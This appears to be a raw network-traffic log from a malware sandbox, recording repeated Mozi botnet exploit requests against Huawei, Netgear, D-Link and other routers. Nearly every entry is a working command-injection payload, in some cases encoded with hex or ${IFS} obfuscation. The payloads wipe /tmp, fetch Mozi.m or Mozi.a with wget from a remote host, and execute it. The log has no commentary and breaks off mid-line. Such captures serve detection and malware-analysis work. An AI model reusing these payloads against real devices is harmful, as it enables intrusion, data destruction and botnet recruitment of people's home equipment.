                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 18.48.0.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 53.254.96.192:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 6.197.162.24:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 129.110.147.175:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 95.201.182.127:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 185.35.83.146:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 25.51.174.183:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l 